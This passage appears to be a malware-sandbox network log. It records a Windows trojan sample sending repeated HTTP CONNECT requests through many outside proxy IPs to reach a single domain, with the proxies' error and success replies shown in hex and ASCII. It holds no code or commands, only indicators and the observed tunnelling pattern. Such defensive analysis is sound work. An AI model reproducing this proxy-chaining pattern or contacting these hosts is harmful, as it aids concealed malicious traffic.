                                                                                Feb 23, 2024 14:28:26.037640095 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.194823027 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.195144892 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.288892984 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                582192.168.2.850147108.61.168.184447225828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.043277025 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.104345083 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.187791109 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.288813114 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:50.288773060 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:02.301898003 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:14.417119026 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                583192.168.2.851692142.54.235.941455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.069632053 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                584192.168.2.851940185.238.228.240805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.174856901 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.261748075 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:26 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                585192.168.2.851868118.91.175.14656785828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.175649881 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                586192.168.2.851886103.127.1.130805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.190228939 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                587192.168.2.851977162.159.246.135805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.190283060 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.278248072 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:26 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                588192.168.2.850425201.71.3.429995828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.190517902 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                589192.168.2.850551109.205.181.27162965828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.196233988 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.194974899 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.195159912 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.288913965 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                590192.168.2.850419103.146.137.910815828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.196518898 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                591192.168.2.85196723.94.50.198156735828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.196881056 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.585510015 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                592192.168.2.850386103.182.112.1150005828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.197288036 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                593192.168.2.85191872.210.252.134461645828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.197446108 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                594192.168.2.851535172.105.52.78311065828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.200082064 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.272699118 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.288727999 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.289021969 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                595192.168.2.851534178.128.82.10527065828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.200542927 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.382318974 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.382764101 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.492317915 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                596192.168.2.85196823.152.40.1431285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.201000929 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                597192.168.2.85192164.225.64.71198335828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.203600883 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                598192.168.2.85192084.39.112.14431285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.204109907 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                599192.168.2.850530195.164.138.3410805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.204246044 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                600192.168.2.851895103.23.100.141455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.204896927 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                601192.168.2.850467181.191.94.12689995828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.205046892 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.436732054 CET19INHTTP/1.1 200 OK


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                602192.168.2.850444193.136.97.17805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.222290039 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.382404089 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                603192.168.2.851950146.59.70.2961475828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.250245094 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.882303953 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.499403000 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.695045948 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                604192.168.2.85196946.182.6.69463835828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.250250101 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.882239103 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.499248981 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                605192.168.2.852007141.94.174.6355575828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.268904924 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                606192.168.2.850390109.123.231.23231285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.269061089 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.382512093 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.382767916 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.492197990 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                607192.168.2.852006147.45.40.100303185828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.275898933 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.882431030 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.492315054 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.695271015 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                608192.168.2.85201234.102.179.21805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.289259911 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.478399038 CET462INHTTP/1.1 405 Method Not Allowed
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Referrer-Policy: no-referrer
                                                                                Content-Length: 317
                                                                                Connection: close
                                                                                Data Raw: 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 74 65 78 74 3d 23 30 30 30 30 30 30 20 62 67 63 6f 6c 6f 72 3d 23 66 66 66 66 66 66 3e 0a 3c 68 31 3e 45 72 72 6f 72 3a 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 68 32 3e 54 68 65 20 72 65 71 75 65 73 74 20 6d 65 74 68 6f 64 20 3c 63 6f 64 65 3e 43 4f 4e 4e 45 43 54 3c 2f 63 6f 64 65 3e 20 69 73 20 69 6e 61 70 70 72 6f 70 72 69 61 74 65 20 66 6f 72 20 74 68 65 20 55 52 4c 20 3c 63 6f 64 65 3e 2f 3c 2f 63 6f 64 65 3e 2e 3c 2f 68 32 3e 0a 3c 68 32 3e 3c 2f 68 32 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <html><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><title>405 Method Not Allowed</title></head><body text=#000000 bgcolor=#ffffff><h1>Error: Method Not Allowed</h1><h2>The request method <code>CONNECT</code> is inappropriate for the URL <code>/</code>.</h2><h2></h2></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                609192.168.2.850430218.255.187.60805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.301850080 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.382556915 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.382769108 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.794310093 CET536INHTTP/1.1 500 Internal Server Error
                                                                                Date: Fri, 23 Feb 2024 13:28:38 GMT
                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                Content-Length: 638
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of
                                                                                Feb 23, 2024 14:28:38.794322014 CET294INData Raw: 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f
                                                                                Data Ascii: the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at heygirlisheeverythingyou


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                610192.168.2.850694154.12.253.232521385828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.316179037 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.382565975 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.382761002 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
